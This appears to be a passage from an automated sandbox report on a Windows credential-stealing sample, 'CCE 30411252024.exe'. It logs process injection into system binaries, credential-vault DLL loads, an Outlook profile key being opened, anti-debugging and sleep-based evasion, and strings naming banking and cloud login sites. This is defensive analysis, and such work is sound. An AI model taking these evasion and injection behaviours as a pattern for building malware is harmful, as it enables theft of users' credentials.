            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: CCE 30411252024.exeStatic file information: File size 1191424 > 1048576
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UIOYLdBBxOZnTzrp.exe, 00000005.00000000.2243558952.000000000006E000.00000002.00000001.01000000.00000004.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000000.2398470881.000000000006E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: CCE 30411252024.exe, 00000000.00000003.2157438700.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CCE 30411252024.exe, 00000000.00000003.2157797690.0000000003860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2226784005.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2224840210.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4604829627.000000000330E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4604829627.0000000003170000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2329854953.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2318712990.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CCE 30411252024.exe, 00000000.00000003.2157438700.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CCE 30411252024.exe, 00000000.00000003.2157797690.0000000003860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2226784005.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2224840210.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.4604829627.000000000330E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4604829627.0000000003170000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2329854953.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2318712990.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2318259516.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285670458.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000003.2255779981.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.4605259560.000000000379C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.000000000097E000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2637377690.000000003C10C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.4605259560.000000000379C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.000000000097E000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2637377690.000000003C10C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2318259516.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285670458.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000003.2255779981.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp
            Source: CCE 30411252024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: CCE 30411252024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: CCE 30411252024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: CCE 30411252024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: CCE 30411252024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EFE01E LoadLibraryA,GetProcAddress,0_2_00EFE01E
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F06B05 push ecx; ret 0_2_00F06B18
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017E5 push ebp; retf 003Fh2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD push ecx; mov dword ptr [esp], ecx2_2_035309B6
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02EA2BF6 push 00000038h; iretd 5_2_02EA2BFA
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02E891E5 push esp; ret 5_2_02E891E6
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02EA7FB4 push FFFFFFBAh; ret 5_2_02EA7FB6
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02E9CF68 push ebx; ret 5_2_02E9CF69
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02E9EF15 push ebx; iretd 5_2_02E9EF3C
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02E9D5CE pushad ; retf 5_2_02E9D5CF
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02E9ED72 push ebx; iretd 5_2_02E9EF3C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031A09AD push ecx; mov dword ptr [esp], ecx6_2_031A09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0053101F push es; iretd 6_2_00531027
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00521126 push esp; ret 6_2_00521127
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0053D1B0 push es; ret 6_2_0053D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00532238 pushad ; iretd 6_2_00532239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0053550F pushad ; retf 6_2_00535510
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0053AB37 push 00000038h; iretd 6_2_0053AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00536CB3 push ebx; iretd 6_2_00536E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00536E56 push ebx; iretd 6_2_00536E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0053FEF5 push FFFFFFBAh; ret 6_2_0053FEF7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00530EAB push ebp; retf 6_2_00530EAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0052FFA0 push esi; iretd 6_2_0052FFA5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00D8429A push cs; retf 6_2_00D842F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00D84268 push cs; retf 6_2_00D842F6
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F48111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F48111
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EFEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00EFEB42
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F0123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F0123A
            Source: C:\Users\user\Desktop\CCE 30411252024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\CCE 30411252024.exeAPI/Special instruction interceptor: Address: 1058F1C
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E rdtsc 2_2_0357096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 4708Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 5263Jump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeEvaded block: after key decisiongraph_0-93556
            Source: C:\Users\user\Desktop\CCE 30411252024.exeAPI coverage: 4.4 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.8 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1776Thread sleep count: 4708 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1776Thread sleep time: -9416000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1776Thread sleep count: 5263 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1776Thread sleep time: -10526000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe TID: 3200Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe TID: 3200Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe TID: 3200Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F26CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F26CA9
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00F260DD
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00F263F9
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F2EB60
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F2F5FA
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2F56F FindFirstFileW,FindClose,0_2_00F2F56F
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F31B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F31B2F
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F31C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F31C8A
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F31F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F31F94
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0053BAB0 FindFirstFileW,FindNextFileW,FindClose,6_2_0053BAB0
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EFDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EFDDC0
            Source: F56GKLK7U4.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: F56GKLK7U4.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: F56GKLK7U4.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: F56GKLK7U4.6.drBinary or memory string: discord.comVMware20,11696487552f
            Source: F56GKLK7U4.6.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: F56GKLK7U4.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: F56GKLK7U4.6.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: F56GKLK7U4.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: F56GKLK7U4.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: F56GKLK7U4.6.drBinary or memory string: global block list test formVMware20,11696487552
            Source: F56GKLK7U4.6.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: F56GKLK7U4.6.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000097E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: F56GKLK7U4.6.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: F56GKLK7U4.6.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: F56GKLK7U4.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: F56GKLK7U4.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: F56GKLK7U4.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: F56GKLK7U4.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: F56GKLK7U4.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: F56GKLK7U4.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: F56GKLK7U4.6.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: F56GKLK7U4.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: F56GKLK7U4.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: F56GKLK7U4.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: F56GKLK7U4.6.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604198582.00000000011AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
            Source: F56GKLK7U4.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: F56GKLK7U4.6.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: F56GKLK7U4.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: F56GKLK7U4.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: F56GKLK7U4.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: firefox.exe, 0000000F.00000002.2638871506.000002E5BC09C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzz
            Source: C:\Users\user\Desktop\CCE 30411252024.exeAPI call chain: ExitProcess graph end nodegraph_0-93213
            Source: C:\Users\user\Desktop\CCE 30411252024.exeAPI call chain: ExitProcess graph end nodegraph_0-93788
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E rdtsc 2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F36AAF BlockInput,0_2_00F36AAF
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EE3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00EE3D19
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F13920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00F13920
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EFE01E LoadLibraryA,GetProcAddress,0_2_00EFE01E
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_01059188 mov eax, dword ptr fs:[00000030h]0_2_01059188
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_010591E8 mov eax, dword ptr fs:[00000030h]0_2_010591E8
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_01057B48 mov eax, dword ptr fs:[00000030h]0_2_01057B48
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov ecx, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA352 mov eax, dword ptr fs:[00000030h]2_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
